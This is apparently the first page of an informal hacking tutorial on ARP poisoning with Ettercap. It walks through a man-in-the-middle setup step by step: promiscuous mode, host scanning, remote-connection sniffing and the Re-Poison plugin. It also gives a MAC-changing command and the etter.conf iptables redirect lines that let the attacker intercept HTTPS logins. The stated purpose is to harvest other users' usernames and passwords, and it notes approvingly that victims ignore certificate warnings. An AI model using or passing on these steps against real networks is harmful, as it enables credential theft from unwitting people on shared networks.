Arp Sniffing

By: Gamma Cpt R3v3r

Arp posioning is defined at http://en.wikipedia.org/wiki/Arp_poisoning . I am not going to go into a definition about it, that is not the point of this article. I will define it just simple as “spoofing” the gateway, and cloning its MAC Address. This can be done in many ways, you can do the change by using

ifconfig <interface> hw <class> <address> or you can use the GNU MAC Changer.

This is also not the point of the addresse. Well technically it is, but what we are really doing is using a GUI program called ETTERCAP. It is available for a free download using M$ and Linux. Using Linux though I think is much easier since it is part of the repository. If you need to download it go to http://ettercap.sourceforge.net/download.php

So we can start now using it. What we will be discussing is a MITM or Man In The Middle attack. What a MITM attack does is what it sounds like. It places something in the middle and act as something else. It can be used to reroute info on the network so that all the info gets sent to another computer such as passwords. That is what I am planning to focus on right now .

Ettercap does this very simple. It is just a one of these things the Ettercap does.

So, lets dive in!!!

Start ettercap, obviously. Once you are in you need to make a few clicks. We will have to make 2 changes to the file, (more on this latter).Click on options and select Promiscuous Mode.

Then what you need to do is click on Sniff, from there select Unifed sniffing, then you will be prompted to chose your connection. I use wireless, so I would chose wlan0. Click ok. It might crash, that is fine just restart it. After you can make it to the next screen select hosts then all you have to do is scan for hosts.

Click on Mitm then make sure you select Sniff remote connections. Then ok. This will make it slightly easier so that you don’t have to add the hosts to eithe group. If you go to another computer on the network and do

arp -a

Once you do this, you will see that there are two different IP address with the same MAC ID. Now, anytime someone uses a computer on a network that requires you will be able to snag their password and username and the URL that they are sending it to.

Like I said there is a configuration must uncomment the following lines.

nano /usr/local/etc /etter.conf

# if you use iptables:
#redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT %rport”
#redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT %rport”

Also, if you were to start an ssh session, you would be given an error telling you that you may be the victim of a Man in the Middle attack, you will then have to remove the info from the allowed hosts, which will not be covered here.

Ettercap has some good tools to keep reposing the system. Click on Plugins and select the Re-Poision. This is vital.

When someone tries to go to a page like g-mail if you don’t make these changes that I described you will not get any info. at all. But, if you do make the changes, you will get the info, but the person would get an Invalid Security Certificate. I would be really worried about this, but according to new studies and things I have done my self, people would just click through it. Good thing for laziness. Like I said, this would be really simple. We will little by little get more into the advanced attacks one can do.

FYI, if you use advanced firewall policies, like apf you will lose the connection and be dropped from the network. APF does have the ability to block this type of attack.

Little by little more would be added to this tutorial. We are only focusing on getting usernames and passwords.

To be continued

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20